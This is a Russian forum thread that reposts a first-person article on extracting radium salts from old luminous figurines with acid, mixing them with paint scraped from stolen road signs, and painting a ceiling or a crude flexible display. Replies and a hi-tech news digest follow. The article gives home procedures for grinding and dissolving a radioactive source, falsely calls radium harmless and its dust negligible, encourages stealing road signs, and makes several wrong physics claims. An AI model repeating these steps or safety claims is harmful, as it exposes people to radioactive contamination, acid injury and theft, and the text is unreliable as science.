Однако один раз мне удалось добиться если не настоящего Джа, то хотя бы некоторого просветления: альфа-частицы хоть и негде приложить в быту в изначальном виде, но они все же являются источником энергии, пусть очень малой. Немного ночной возни со страшилами-агрегатами без преподавателя над душой подтвердили жизнеспособность некоторых моих глупостей.

[Джа]

В первую очередь для нашего полурелигиозного экстаза потребуется источник радиации. В нашем случае самый простой способ - не попасться на краже плутония, а обойтись старыми стеклянными «флуоресцентными» фигурками, которые очень часто оккупируют бабушкины серванты. Еще очень помогают командирские часы старой закалки со светящимся циферблатом. Оба варианта обеспечили меня одним из неопасных изотопов радия, который довольно щедро добавляли в подобную бижутерию. Отличить радиоактивную безделушку от люминесцентной можно и без счетчика Гейгера: достаточно поместить испытуемый предмет в темное место на ночь. Настоящий люминофор, который содержится в более современных поделках, перестает светиться через 3-7 часов, после чего его необходимо «подзаряжать» на свету. Никакой радиацией тут и не пахнет. Радий же будет дружелюбно пощелкивать счетчиком еще полсотни лет. Испытывать панический ужас перед излучением не стоит, ведь это альфа-радиация, к тому же настолько слабая, что она полностью экранируется стеклянной дверцей того же серванта или крышкой на часах.

Будем считать, что немного радиации мы добыли, не преступая закон, теперь перейдем ко второй фазе, возможно, чреватой административной ответственностью. Необходимо добыть люминофор. Бабушкины серванты с более современными сувенирами тут вряд ли помогут, так как нам нужно много рабочего вещества (Раскольников - не наш герой) - в сотни раз больше, чем можно добыть из светящихся фигурок. Придется воровать дорожные знаки!

Обычно дорожные указатели покрывают белой «отражающей» краской, которая на самом деле является коротковременным люминофором, а не «отражателем». Принцип эффекта люминисценции довольно прост: кванты света или излучения поглощаются веществом, точнее световая энергия поднимает электроны на более высокоэнергетические орбитали атомов (я намеренно упрощаю описание процесса, так как он нас не слишком интересует). В подавляющем большинстве случаев энергии квантов света не хватает для «подкачки» атомарных электронов, к тому же не каждый атом имеет разные уровни орбиталей с небольшой разницей в энергии. Даже если это знаменательное событие произошло наперекор всему, то эта неустойчивая позиция тут же разрушается - электрон возвращается на внутреннюю орбиту, а высвободившаяся энергия излучается в виде кванта света. Столько всего произошло, а результат нулевой...

В свою очередь люминофоры состоят из веществ с подходящими нам свойствами, то есть могут удерживать электрон на высшей орбите некоторое время, что позволяет им накапливать световую энергию, а потом постепенно излучать ее, самостоятельно светясь. Чтобы добиться долгого и яркого свечения, необходимо готовить люминофор c учетом определенных жестких условий. Например, его можно приготовить из оксида цинка с чистотой максимум в 0,01 процента примесей, а легирующие добавки в виде солей серебра, марганца или золота должны добавляться в точно отмеренных микроскопических объемах, причем даже точное соблюдение пропорций и чистоты не гарантирует приемлемый результат, так как подготовленную смесь нужно выдерживать в строго заданном температурном диапазоне в 700-750 градусов в течении нескольких часов!

Как видишь, кристально честный способ производства в домашних условиях нереализуем, поэтому мы и возвращаемся к дорожным знакам. Люминофорная краска, которой прорисовывают стрелки и буквы, является «короткоживущей», а потому недорогой. Время послесвечения измеряется сотыми долями секунды, зато все мы видим, как ярко эта краска «отражает» свет фар ночью. Однако тот, кто хоть мельком знаком с принципом работы подкачки в самых простых лазерах, легко поймет, куда я сейчас клоню. Увеличить время послесвечения люминофора очень трудно, но ведь пока фары автомобиля освещают знак, отраженный свет радует взор автомобилиста. Заменим постоянное видимое излучение фар невидимым диапазоном, который будет постоянно подзаряжать наш люминофор. Сразу же на ум приходит тепловое, то есть инфракрасное излучение, но люминофоры имеют одно неприятное свойство: они выдают свечение с большей длиной волны, чем «исходный» свет. Нам нужно более жесткое излучение, именно поэтому придется грабить серванты ближайших родственников. Радий выдает, конечно, не квантовую gamma-радиацию, но излучаемые тяжелые альфа-частицы при столкновении с довольно частыми примесями тяжелых атомов в люминофоре выделяют достаточно энергии. Если смешать наш недолюминофор и радиевую соль, то мы получим источник света с внутренней подкачкой! Радий «светит» десятилетиями, так что наш люминофор будет светиться в видимом диапазоне столько же. Более того, представь, сколько бы потребовалось энергии для калорифера в качестве подкачки, если все же попытаться воспользоваться инфракрасным спектром - этот способ абсолютно нерационален!

[ближе к реализму]

Краску с дорожного указателя нужно аккуратно снять шкуркой-нулевкой, стараясь не соскрести металлическую основу знака. Чем меньше будет примесей, тем лучше. Светящуюся фигурку с радием лучше подобрать пластмассовую, но стеклянная тоже сойдет. Из пластиковой основы можно легко вытянуть соли радия любой кислотой (хоть соляной, или даже уксусом), в то время как со стеклом придется повозиться: мало того, что придется толочь стекло до состояния пыли, так еще и оксид кремния, из которого стекло, собственно, и состоит, обязательно попадет в результирующую смесь в виде примеси и будет задерживать большую часть радиации. Нам это ни к чему - пластик легко натереть даже на терке. Если в наличии имеются только стеклянные фигурки, то можно попытаться найти плавиковую или ортофосфорную кислоты. Первая достаточно быстро «разъедает» стекло, и мы в результате получаем фторид радия. Ортофосфорная кислота «разъедает» стекло очень медленно. Проблема с плавиковой кислотой заключается в том, что это весьма агрессивная вещь, к тому же придется использовать пластиковую посуду, да и вообще, хорошо бы иметь практический опыт хотя бы в аналитической химии - рассчитывать и даже титровать придется много. Ортофосфорная кислота не так опасна, поэтому не требует особых знаний, но как и плавиковую, ее проблематично достать.

С пластиковой фигуркой процедура попроще: достаточно ее растолочь, натереть в стружку или в пыль (в зависимости от пластика), после чего залить соляной кислотой. Весьма злой 30% раствор HCl за несколько минут вытянет хлорид радия. Соляная кислота не является стратегическим веществом, поэтому ее нетрудно найти в хозяйственных магазинах. Главное ее преимущество заключается в том, что кислота представляет собою раствор газа HCL в воде. Полученный после реакции раствор достаточно медленно выпарить - вода и возможные остатки HCL просто выпарятся. Но необходимо соблюдать осторожность с парами HCL, так как они очень едкие и ненамного отличаются по физиологическому действию от чистого хлора, зарекомендовавшего себя как неплохое боевое отравляющее вещество во время первой Мировой войны. Проще всего провести процедуру выпаривания на открытом воздухе. Стоит отойти на пару метров, пока вся жидкость не выкипит, так как запах выделяющегося HCl быстро испортит настроение. Его концентрация неопасна, но несколько очень неприятных минут для слишком любопытных будут обеспечены. Я же использовал химический респиратор и защитные очки при открытых окнах. Холодно, но мне не привыкать.

Полученную солевую выпарку растворяем в теплой воде и смешиваем со соскобленной краской-люминофором. На дне соберется нерастворимый осадок, который нужно хорошенько переболтать, чтобы раствор с солями попал даже в самые мелкие поры осадка-люминофора. После этого раствор снова выпариваем, причем теперь особых мер безопасности не потребуются. Полученную белую массу крошим, растирая смесь в пыль. Экономить время на этой процедуре не стоит: от нее будет зависеть равномерность свечения.

Теперь можно позаботиться о вяжущем веществе. Обычно в его качестве выступает парафин, но, после того как ты размешаешь нашу смесь в расплавленном парафине, попробуй размазать полученный брикет по максимально большой поверхности - площадь покрытия получится минимальной. Хотя карандаш из такого парафина - отличная вещь. Для равномерного покрытия светящимся составом больших поверхностей удобнее превратить наш порошок в краску, для чего его нужно безжалостно высыпать в банку с белой гуашью (белый цвет краски достигается при помощи оксида цинка, а ведь это основа люминофоров - два зайца просто расстреляны из пулемета!).
Теперь можно творить. Любой белый лист ватмана с пористой структурой нужно покрыть парой слоев нашей краски или натереть куском парафина с люминофором, собрать пару десятков таких листов и обклеить ими потолок. Свечения этой конструкции должно хватить вам на 20-30 лет, так что о ночных кошмарах и монстрах в темных углах можно забыть. Интенсивность излучения очень мала в двух смыслах: как в видимом диапазоне, так и с точки зрения радиационной безопасности.

Днем покрашенная люминофором бумага будет выглядеть как обычный, причем очень аккуратный и добротный мелованный потолок, а свечение будет заметно только в темное время суток, хотя его будет достаточно, чтобы легко распознавать предметы в комнате и даже читать. Счетчик Гейгера перестает регистрировать хоть что-нибудь уже на расстоянии полуметра от потолка, но особенно мнительные граждане могут прикрыть потолочную бумагу слоем прозрачного пластика. Так что ты быстро привыкнешь к зеленому свечению в стиле злых алиенов с Марса.

[антиглобалистская визуализация]

Размалевать потолок зелеными разводами - невелика заслуга. Этим развлекаются толпы бездельников школьного возраста, иногда даже выказывая некоторый художественный вкус, несмотря на заборность своей графики. Но я был бы не я, если бы остановился на банальной мазне и не попытался в очередной раз разоблачить непомерную жадность и лень производителей компьютерной техники.

На этот раз мы убедимся, что траты японцев на разработку тонких гибких жидкокристаллических панелей являются банальным надувательством и раздуванием фондов. После успешного завершения опытов я из любопытства пошуровал в старом архиве пресс-материалов, которые мне присылали из лаборатории Токийского технического университета. Исследователи получали от отечественных и корейских корпораций очень немалые гранты на разработку гибких ЖК-экранов - общая сумма на состояние 2002 года достигла астрономической суммы в 25 млрд. иен, что составляет около 220 млн. долларов США. Нули замучаешься выписывать! Судя по всему, каких-то серьезных сдвигов за последние три года не наблюдается. Наверняка еще десяток миллиардов японских рублей было потрачено на бесполезные изыскания, когда мне достаточно было двух недель и суммы, эквивалентной кружке хорошего пива.

Совершенно случайно на глаза мне попалась небольшая статейка про создание экономических промышленных осветительных приборов. В этот класс входят не только разнообразные лампы, но и индикаторы, которые должны работать в агрессивных средах или просто неудобных для обслуживания местах. В частности статья мелком упомянула, что в аэропорту Хитроу начали испытывать ночную разметку на базе краски, которая светится при наличии разницы потенциалов. Простота и изящество идеи отлично пересекаются с моей светящейся краской. В статье упоминалось, что основа для разметки тоже представляла собой достаточно простой люминофор с очень небольшой примесью растворимых солей слаборадиоактивных металлов. В качестве связующего вещества использовался прозрачный пластик с гелевой основой внутри, роль которого в моем опыте выполняет парафин.


Несложно догадаться, что растворимость соли и гель требуется для того, чтобы небольшая диссоциация позволяла обеспечить слабый ток при наличии разности потенциалов. В моем случае задача облегчается тем, что хлориды большинства металлов сами по себе гигроскопичны, так что даже, несмотря на парафин, диссоциация будет иметь место (обычный свечной парафин не является смесью чистых предельных парафинов, а содержит не только влагу, но и кучу примесей в виде альдегидов или хотя бы углеводородов с двойными связями - все это позволяет удерживать в веществе до полупроцента влаги).

Первый же опыт с куском ватмана, пальчиковой батарейкой и парой проводов показал, что яркость свечения незначительно увеличивается. Чтобы увеличить количество влаги в своей «краске», я добавил немного поваренной соли и сахара в расплав парафина. Хлорид натрия увеличит проводимость за счет увеличения ионов, а сахар отличается потрясающей гигроскопичностью: попробуйте оставить сахарницу открытой - кристаллы слипнутся, а через неделю могут вообще превратиться в стеклообразную патоку. Теперь свечение отлично заметно даже при электрическом освещении.

Дальше - дело техники. Разлиновываю ватман, капаю в клетки по капле парафина с люминофором, подвожу к каждой пару проводов по принципу светодиодных панелей, а затем жгут выводов подвожу к простейшему контроллеру. Большинство контроллеров используют рабочее напряжение в пределах от 1,5 до 5 вольт, чего за глаза хватает нашему детищу. В результате получаем монитор-индикатор с копеечным разрешением, который можно мять, крутить, запитывать прямо от контроллера и собирать за пару часов в полевых условиях. Пористость ватмана позволяет провести некоторые косметические изменения. Например, я закапывал клетки в теплой духовке, чтобы парафин быстро пропитал ватман насквозь: это позволило подвести провода к одной стороне листа, а наблюдать свечение с другой - маленькая косметическая правка позволила сделать удобный индикатор.

Однако даже ужасающие величины dpi трудно назвать недостатком - из нескольких таких лисиов можно составлять большие индикаторные панели. Единственным серьезным недостатком можно считать только монохромность, хотя еще совсем недавно монохромные Palm'ы были популярны. Сложность создания цветных панелей заключается в том, что придется повозиться с контроллерами и их программированием (потребуется по одному на каждый из компонентов R, G и cool.gif, а также в поиске легирующих примесей, которые дадут необходимые синий и красный оттенки свечения. Например, найти соли кобальта, кадмия или осмия в нашем насквозь антитеррористическом мире стало в десятки раз сложнее, чем каких-то пять лет назад.

[конец – делу венец]

Чтобы окончательно довести идею до абсурда, я использовал в качестве контроллера легендарное чудовище Z80, для которого не паял контроллеры только ленивый. Простое программирование, огромное количество схем и возможность делать отводы прямо от шины данных позволяют собрать «моноблок» минимальными силами. Как видите, хоть шедевра не получилось, но теперь я могу чувствовать себя круче создателя первого Apple: я не только сам спаял «Синклер», но и собрал к нему монитор.




Автор: Tier Nov 17 2006, 18:17

класс, я как раз только недавно думал про гибкие дисплеи.

тока навеает мыысли о будующем сопромате.

Автор: Metallica Nov 17 2006, 18:25

Цитата(Tier @ Nov 17 2006, 19:17) *

класс, я как раз только недавно думал про гибкие дисплеи.

тока навеает мыысли о будующем сопромате.

Дядя би я про плоские маниторы читал в книге 50 годов только там это было как мечта
но уже знали что это можно сделать были и схемы . Расматривалось как телек будущего
ну плазменный кароче.

Автор: Tier Nov 17 2006, 19:05

да не плоские, а гибкие, считай в трубоку свернул а4 вормат и пошел, а метро проводин к кпк подсединал и смотри себе кино, потом опять скрутил его трубочкой и усе)

Автор: Metallica Nov 17 2006, 19:57

Цитата(Tier @ Nov 17 2006, 20:05) *

да не плоские, а гибкие, считай в трубоку свернул а4 вормат и пошел, а метро проводин к кпк подсединал и смотри себе кино, потом опять скрутил его трубочкой и усе)

Да я понял что гнущийся я так просо для истории о плоских
А гнущиеся я вкакомто фильмеце фидел там тпа чел разварачивает как свиток и там карта местности


Автор: Tier Nov 17 2006, 20:05

а вроде у нокии уже есть телевон как браслет сделан то есть с гнужимся диспеем

Автор: drusha Nov 18 2006, 12:02

Прогресс-прогрессом... А я, вот, много лет назад уже думал про такую фишку. Что, вот, носит человек очки, скажем. Ну, зрение у него такое, что он их по-любому носит. Или солнечные... А чего бы их не автоматиировать? Ну, первым делом - подогрев от запотевания. Достаточно чтобы они сами градусов 25-30 держали. Потеть не будут. Вторая фишка - чтобы становились солнечными (тёмными) или прозрачными сами в зависимости от освещения. Технически это не сложно. Ну и встроенные дисплеи. На каждый глаз - свой. Стерео, то бишь. Микродисплейчики отражаются в вогнутых стёклах очков, при этом увеличиваются и проецируются на бесконечность. То есть, изображение в стереоварианте смотришь прямо перед собой. И даже диоптрии регулировать можно. Окружающую обстановку тоже видишь. А там на стёклах ещё слой с регулируемой зеркальностью. А что сильнее проступает (реал или втртуал) - это ручку крутить можно... Беспроводной пульт управления в кармане. В принципе, чисто технически - ничего особо сложного. Странно даже, что такие девайсы не получили пока распространения. Ведь всё для этого сейчас уже есть! Были когда-то громоздкие шлемы, но они в моду не пошли (и правильно). А очки, типа, как обычные...

Автор: Tier Nov 18 2006, 12:20

кст очки с диспеями есть уже кое каие протатипные разработки.

Автор: Metallica Nov 18 2006, 21:31

НовостиVerbatim представляет диски Mini DVD+R DL

Продолжают развиваться оптические диски. Растет скорость работы с ними и объемы информации, которые они могут в себя вместить. Компания Verbatim обещает нам диски Mini DVD+R DL, которые имеют 8 сантиметров в диаметре, а объем — 2,6 Гб (около часа видео). Бояться не стоит: они полностью отвечают стандарту DVD+R DL, который утвержден DVD+RW Alliance, и совместимы с любыми накопителями, поддерживающими этот формат. Чтобы твои гигабайты данных не повредились, на поверхность диска нанесен специальный защитный слой Scratch Guard, который, по словам производителя, делает диски в 40 раз более устойчивыми к повреждениям. Стоит добавить, что эти болванки появятся в продаже в начале лета, вместе с видеокамерами, которые могут с ними работать.

Универсальный проектор Epson

Новый проектор компании Epson представляет собой устройство для выполнения самых разных задач. Он создан на основе передовой 3LCD и обеспечивает качественное, яркое и четкое изображение. Проектор обладает яркостью в 1800 люмен, а его контрастность составляет 500:1. В проекторе EMP-S4 реализована слайд-крышка объектива и функция быстрого включения/выключения – подготовка к работе займет у него 4 секунды. Благодаря технологии E-TORL проектор может работать в хорошо освещенной комнате, не теряя качества картинки (диагональю 60 дюймов), которую он может создать с расстояния 1,8 м. Закрывая слайд-крышку, человек одновременно приостанавливает показ картинки и звучание музыки, что дает докладчику новые возможности при ведении конференций. Стоит добавить про уровень шума в 30 дБ и вес в 2,6 кг. Не забудь и про русифицированное меню.

И снова Walkman

Компания Sony вновь порадовала своих поклонников выпуском новых моделей плееров Walkman. Сегодня изменения коснулись линейки E: новые модели называются NW-E002, NW-E002F, NW-E003, NW-E003 и NW-E005. Их главная особенность – система быстрой зарядки, которая дает плееру возможность работать более суток, проигрывая музыку в форматах ATRAC3, WMA и MP3. Кстати, емкость новых плееров составляет от 512 Мб до 1 Гб, а в их комплект поставки входит ПО SonicStage для удобного управления музыкой и загрузки треков. Если вдруг тебе надоест загруженная музыка, то спасением станет встроенный радиотюнер. Корпус выполнен из поликарбоната и имеет шесть вариантов расцветки. Стоит добавить, что Sony планирует выпускать массу аксессуаров к данному устройству.

Pentium M влезает в десктопы

Очередную системную плату для настольного ПК, которая может работать с процессором Pentium M (Socket 479), нам представила компания AOpen. На этот раз это бюджетное решение. Устройство AOpen s661FXm-FSN имеет два слота DIMM для памяти DDR400 (до 2 Гб), порт AGP 8X, и три PCI, а также встроенный графический адаптер SiS 661 FX. На плате установлен и встроенный 6-канальный звуковой контроллер ALC655. Кроме того, новинка содержит 4 разъема UDMA, два коннектора SATA (поддерживается RAID 0 и 1). Кроме USB, есть возможность подключать FireWire-устройства. Завершает картину сетевой контроллер. Кстати, плата имеет форм-фактор MicroATX, поэтому, учитывая низкое тепловыделение ЦП Pentium M, на ней можно собрать небольшой, недорогой и тихий ПК.

Головной набор Logitech

Новая гарнитура компании Logitech называется PC Headset 120 и отлично подходит для звонков с компьютера на компьютер, голосового общения в сети, крика на товарищей по оружию в сетевых играх, а также, естественно, может работать и как обычные наушники. Гарнитура имеет удобное оголовье, так что, надев, ты тут же о ней и забудешь – никаких неудобств. Полоса пропускания самой гарнитуры — 20-20000 Гц, микрофона — 100—10000 кГц. Длина кабеля — 2 м. Если ты по-прежнему считаешь такое устройство излишним и ненужным, то знай, что популярность передачи голоса в сети постоянно растет. Например, программу Skype во всем мире скачали уже 250 миллионов человек.

ТВ по-новому

Компания Compro выпустила TV-тюнер, который совершенно не похож на большинство устройств такого плана. Во-первых, он не подключается к компьютеру – устанавливается на пути между системным блоком и монитором. Естественно, он отлично выполняет свою главную функцию, то есть показ телевизионных программ на мониторе твоего ПК. За качество картинки отвечает фирменный чип, который, кстати, поддерживает разрешение 1600х1200, разные соотношения сторон (4:3, 16:9 и 16:10), работает с разными типами мониторов и имеет разъем S-Video. Среди возможностей устройства присутствует и функция наложения изображения, то есть картинка в картинке: часть твоего рабочего стола может стать телевизором, а другая — остается свободной для пасьянса. Стоит добавить, что в комплект входит и пункт дистанционного управления. С таким устройством можно не только ТВ смотреть, но и друзей удивлять.

Хромированная VIA

Компания VIA выпустила новый чипсет со встроенным графическим ядром Chrome9, готовый к работе с будущей операционной системой Windows Vista. Новый чипсет поддерживает новейшие процессорами Intel Core Duo, память DDR2 667 и шину PCI Express. Встроенный GPU Chrome9 является DirectX 9-совместимым, поддерживает шейдеры версии 2.0, HDTV-форматы (с разрешением до 1920х1080) и фирменную технологию VIA Chromotion, которая позволяет улучшить качество изображения. Шина V-link сможет связать этот чипсет с любым южным мостом VIA, например, с VIA VT8251, обладающим встроенным кодеком VIA Vinyl (8 каналов, HD-звук, 32-бит/192 кГц). Так что у производителей появится возможность по созданию весьма разных и интересных системных плат на основе новинок от VIA. Итак, новый этап чипсетного противостояния nVidia и VIA открыт!

Системная плата на будущее

Хотя процессоры под сокет AMD M2 пока редкость, волна системных плат, которые их поддерживают, продолжает наступать. Сегодня и компания Foxconn заявила о том, что ее новинка – плата C51XEM2AA – может работать с AMD Socket AM2. Мать построена на чипсете NVIDIA nForce 590 SLI, который дает ей возможность работать с двухканальной памятью DDR2-800. Имеется 2 порта PCI-E x16, один — PCI-E x4, 1 PCI-E x1 и два обычных PCI. Кроме того, установлено 6 коннектеров интерфейса SATA 2, поддерживающего RAID. Также стоит отметить звуковой HDA-адаптер и два встроенных гигабитных сетевых контроллера. Энтузиасты наверняка оценят кнопки питания и сброса на плате, систему идентификации ошибок, состоящую из динамика и двух светоидов. Так что ждем новых процессоров!

Hi-tech news

Юрий Свидиненко «Lazarus» (kammerer_max@yahoo.com)

Робот-ящерица

Зачем нужен механический геккон? Сказать трудно, однако давай воспринимать факты такими, какие они есть. Марк Каткоски и его команда из Стэнфорда построили StickyBot — опытный образец робота-альпиниста, который карабкается по стенам за счет четырех «сухих» липких ног. StickyBot должен двигаться по вертикальным плоскостям за счет «сухого прилипания», причем управляемого. Гекконы используют нановолоски для путешествий по вертикальным препятствиям. Нанотрубки, которые с успехом их заменяют, ученые делают уже давно. Однако снабдить такими липкими ногами не то что человека, а робота пока не было и речи. Лапы у робота-геккона сделаны из синтетических щетинок - эластомеров, а не нанотрубок. Каждый из этих волосков «прикрепляется» к стене межмолекулярной силой, известной как сила ван дер Ваальса. StickyBot пока двигается очень медленно и срывается, но исследователи надеются, что роботы такого типа в будущем смогут служить в качестве планетарных роверов и/или спасательных ботов.

Механическая рука, читающая мысли

Помнишь детскую игру камень-ножницы-бумага? Так вот, теперь с роботами в нее играть нельзя: прочитав твои мысли, они уже знают, что ты выбросишь в следующий момент. Сделать это было непросто. Основа системы считывания мыслей - функциональный магниторезонансный сканер активности мозговой деятельности (fMRI) в реальном времени. Этот фантастический девайс соединен с довольно гибким механическим протезом руки. Ну, конечно, это покруче, чем управлять курсором мыши на экране с помощью мысли. Представь себе: по токам крови внутри сосудов головного мозга fMRI строит картину мозговой активности и, исходя из ряда шаблонных карт, приказывает руке принять соответствующее положения. Подумал сделать рукой о'кей - и вот механические пальцы сами сложились в знакомую загогулину. Удивительно, правда? Больше всего это изобретение пригодится инвалидам, для которых, собственно, и разрабатывалась система fMRI.

Дисплеи: от 2D к 3D

Может быть, что вскором времени в мобилах и не только в них появятся трехмерные дисплеи. Samsung SDI представила успешную разработку новой технологии, позволяющей воспроизводить объемные изображения на дисплеях практически любых устройств. Основа технологии хитрых корейцев - плоские панели с активной матрицей на органических LED'ах (active matrix organic light-emitting diode - AMOLED), что неудивительно, поскольку Samsung является лидером в области построения LED-дисплеев. Общественные организации представили в рамках анонса 4,3" AMOLED-дисплей, который обеспечивает наибольшую скорость работы и наилучшее разрешение объемного изображения по сравнению с уже существующими 3D-дисплеями. Но на достигнутом Samsung не останавливается. В настоящее время компания продолжает работу над технологией, чтобы сделать возможным ее использование не только в мобилах, но еще в ноутбуках и телевизорах. По прогнозам Samsung, в ближайшие лет десять большинство дисплеев будут поддерживать функции воспроизведения объемного изображения, а к 2010-му году спрос на 3D-дисплеи возрастет вдвое.

Элитный светодуш

Американская компания Interbath занимается системами для душа с приставкой Luxury уже, наверное, лет тридцать. И вот наконец-то решила выпустить светящийся электронный душ (Electronic Light Shower — ELS). Кроме электроники, душевая лейка (да простят мне такое грубое обращение!) оформлена настоящими кристаллами Swarovski. Если не смотреть на кристаллы, то ELS больше всего похож на лампу в операционной. Система действует так: по вашему выбору струйки воды либо непрерывно меняют цвета, либо освещают и омывают вас любимым цветом. Для выбора есть зеленый, желтый и голубой. А красного, увы, нет. Это связано с тем, что после частого применения красного душа будут шалить нервишки smile.gif Но для того, чтобы увидеть, как светится это чудо, нужно выключить свет в душевой кабине. Свет идет к воде по оптоволоконному кабелю из коробочки, где установлены галогенные лампы и крутящееся колесо с разноцветными линзами. Принцип простой, но почему-то никто не додумался его использовать именно в душе. В головке душа имеется 270 дырочек. И к каждому отверстию свет подведен отдельным волокном диаметром около 1 миллиметра. Стало быть, с одной стороны, к головке ELS подходит кабель со светом, а с другой — вода, по обычному вполне шлангу. «Лечите нервы в лучах воды», — советует Interbath.

Самый быстрый транзистор в мире

Кто на свете всех быстрее? Конечно, транзисторы, и не простые, а MOSFET, недавно построенные учеными из Гарварда. Скоростной транзистор состоит из германиево-кремниевого ядра и кремниевых нанострун. Как говорят эксперты, это самый совершенный полевой транзистор, который когда-либо был создан. Ge/Si нанострунный полевой FET в 3-4 раза быстрее, чем современные кремниевые CMOS. Также этот нанотранзистор может посоревноваться в области быстродействия с обычными плоскими полевыми FET'ами, а также с наиболее быстрыми транзисторами на основе нанотрубок, которые до настоящего момента были абсолютными рекордсменами. Скорее всего, в недалеком будущем микроэлектронной индустрии появится новый стандарт FET-устройств – нанострунный Ge/Si FET. Также новый нанотранзистор технологически совместим с логическими схемами на прозрачных и гибких основах – пластике, органических пленках и т.п.

Модельки из атомов

Моделирование наноструктур – задача сложная, требующая специального программного обеспечения и трудностей по составлению самой модели. Но несмотря на это, ученые продолжают разрабатывать и моделировать разные молекулярные запчасти. Так, недавно ученые из компании NanoREX смогли на программном комплексе nanoENGINEER-1 создать модель универсального шарнира, спроектированного Эриком Дрекслером и Ральфом Меркле еще в 1992-м году. Исследователям удалось показать динамику работы шарнира, и с помощью результатов моделирования было установлено, что оба шарнирных плеча могут изгибаться до 20° относительно друг друга. При этом части шарнира не имеют точек трения! Они изгибаются на химических связях, держащих две части механизма. По результатам исследований была составлена анимация работы шарнира, в котором он изгибается до 40°. Частота изгибаний шарнира - 100 Гц. Состоит девайс из 3846 атомов, его длина – 6,4 нанометров, ширина и высота – 3,8 нм. Эта модель – одна из попыток создать машину без трущихся частей вообще. Ученые теперь планируют смоделировать этот механизм в составе уже известного тебе молекулярного автомобиля для приведения в движение нескольких колес от центрального лопастного двигателя. Что же будет дальше, если автомобилям прицепят еще и небольшой компьютер?

Бактерия в киберпространстве

В одном из прошлых выпусков ты уже читал, как ученые впервые оцифровали вирус. Теперь они взялись за кишечную палочку - бактерию E.Coli. И хотят не только ее там смоделировать, но и создать ей «реальную» среду, в которой она сможет жить. Тогда станет возможным изучить не только биохимию палочки, но и оцифровать работу генов в реальном времени. «Вы только представьте себе, что можете сесть за компьютер и проводить над животным разные эксперименты, наблюдая, как и что работает, попутно выясняя, почему это произошло, а это — нет, — рассказывает канадский профессор Майкл Эллисон, биолог из университета Альберты. — Мы не сможем совершить революцию в биологии, пока не научимся моделировать живой организм».

Шансы на успех появились у ученых только в последние несколько лет, а когда удастся достичь результата — можно только гадать. И это притом, что ученые замахнулись всего лишь на скромного обитателя человеческого кишечника, который устроен довольно просто. Выбор в пользу E. coli, одной из любимейших учеными модели для биологических экспериментов, доктор Эллисон объясняет так: «Мы взяли самый простой организм, о котором знаем больше всего». И вот, с целью оцифровать бактерию в ноябре 2002-го года был сформирован Международный альянс (International E. coli Alliance — IECA). В эту организацию вошли канадцы из проекта Cybercell, японцы из Института передовых биологических наук (IAB), англичане из группы IBEC, американцы из консорциума E.coli, фармацевтическая компания GlaxoSmithKline и многие другие.

Альянс распределил задачи между лабораториями, и началась реализация проектов, в ходе которой ученые из разных стран объединяют свои усилия. «Но даже если бы мы смогли сегодня создать модель всей бактерии, это не означало бы, что мы смогли бы понять созданное, — добавляет Тьерри Эмонет из Чикагского университета. — Хитрость в том, что мы должны вести строительство шаг за шагом, проверяя и изучая явления по очереди». Так, глядишь, лет через 10 дойдут и до оцифровки тебя самого.

Первый робот-полиморф

Тебе, наверное, и так понятно, зачем нужен многофункциональный блочный робот. О них много писали и даже показывали прототипы. Но теперь можно со всей уверенностью сказать, что первый робот-полиморф создан. Это сказал адъюнкт-профессор Вэй Минь Шэнь из университета Южной Калифорнии (USC). Назвали машину довольно скромно - SuperBot. Бюджет «Супербота» составляет ни много ни мало $8 миллионов. И деньги эти, в основном, идут от NASA, потому как робот нацелен на освоение космоса. Задумывался SuperBot как модульный, многофункциональный и переконфигурируемый робот. В теории он может ползти, как змея или гусеница, превращаться в колесо, а также сформировать руку-манипулятор, стать ровером, машиной-альпинистом, чтоб спуститься в кратер, или даже быть мобильной платформой. Создать такого гибкого робота позволили автономные, интеллектуальные и самопереконфигурируемые модули, лежащие в основе всей системы. Отдельно взятый модуль, имеющий 2 электромоторчика и компьютерный чип, может самостоятельно передвигаться и переворачиваться. Соединиться друг с другом модули могут в четырех местах с различной ориентацией. На закуску разработчики намереваются продемонстрировать «летательные способности» единственного модуля в условиях микрогравитации.

Квантовые дисплеи - «старая» новинка

Как тебе известно, плоские и даже гибкие дисплеи – уже не новинка на мировом рынке электронной техники. Но современные LCD- и OLED-дисплеи не могут обеспечить достаточной яркости и контрастности. А те, которые могут, стоят довольно дорого. В связи с этим различные компании ведут поиски новых продуктов, способных при относительно низкой стоимости предложить потребителю гибкий дисплей с высокой контрастностью и быстродействием. И при этом была «реанимирована» технология дисплеев на квантовых точках. Квантовые точки — это специальные нанокристаллы, ведущие себя как один отдельный атом. Первый прототип-дисплей от американской компании QD Vision's — всего лишь монохромная полоска размерами 32х64 пикселя. Но, несмотря на малые размеры прототипа, Ко-Салливан, представитель компании, уверяет, что через несколько месяцев будет сконструирован прототип «квантового дисплея», не уступающий по разрешению современным НDTV. Кроме высокой яркости и контрастности (изображение на дисплее можно видеть даже при ярком солнечном свете), устройство будет потреблять меньше энергии, чем современные аналогичные LCD телевизоры. Также новый дисплей можно изгибать практически в любом направлении. Также дисплей на квантовых точках может покрывать гораздо больше цветов из видимой области спектра, чем любой OLED или LCD. Как говорит Салливан, количество цветов, отображаемых QD-LED дисплеем может быть на 30% больше, чем в современных CRT-дисплеях. Снижение энергопотребления достигается за счет того, что нерабочие пиксели не потребляют энергии, в то время как в LCD-дисплеях задняя подсветка работает все время, несмотря на то, сколько пикселей в настоящее время заблокированы. Для производства одного фотона в QD-LED тратится всего 50 электронов, что немного для светоизлучающего устройства. Поэтому дисплеям на квантовых точках также не потребуется задней подсветки, без которой LCD-дисплей невозможно сконструировать.

Часики для яхтсменов

Наручные часы... Казалось бы, вещь простая и доступная. Но при желании даже из наручных часов можно сделать такой девайс, что даже непонятно, зачем он такой нужен. Так, двое мировых светил в области часового мастерства Жан-Францис Рюшонне и Вианни Хальтер, скооперировавшись, сделали непростые наручные часы. Этот девайс, внешне смахивающий на кассовый аппарат, выпущен ограниченным тиражом - всего-то 135 штук. И цена у них соответствующая — от $220 тысяч. Назвали детище Cabestan — лебедка с барабаном, насаженным на вертикальный вал, для подтягивания речных судов у причалов, выбирания судовых якорей и тому подобного. И правда, часы внешне напоминают две лебедки, соединенные между собой рядом передач. Рюшонне говорит, что при создании Cabestan вдохновлялся морской тематикой. Отсюда и якорная цепь на лебедке и некоторое сходство хронометра с навигационным прибором. Часики действительно морские - в них можно даже нырять под воду до 30 метров. Но и это не последнее слово mad-часовщиков. Жан-Францис задумал трилогию: концепт Monaco V4 воплощал собой землю и автомобиль, «Кабестан» — море и корабли, а третий хронометр, находящийся в разработке, будет посвящен воздуху и 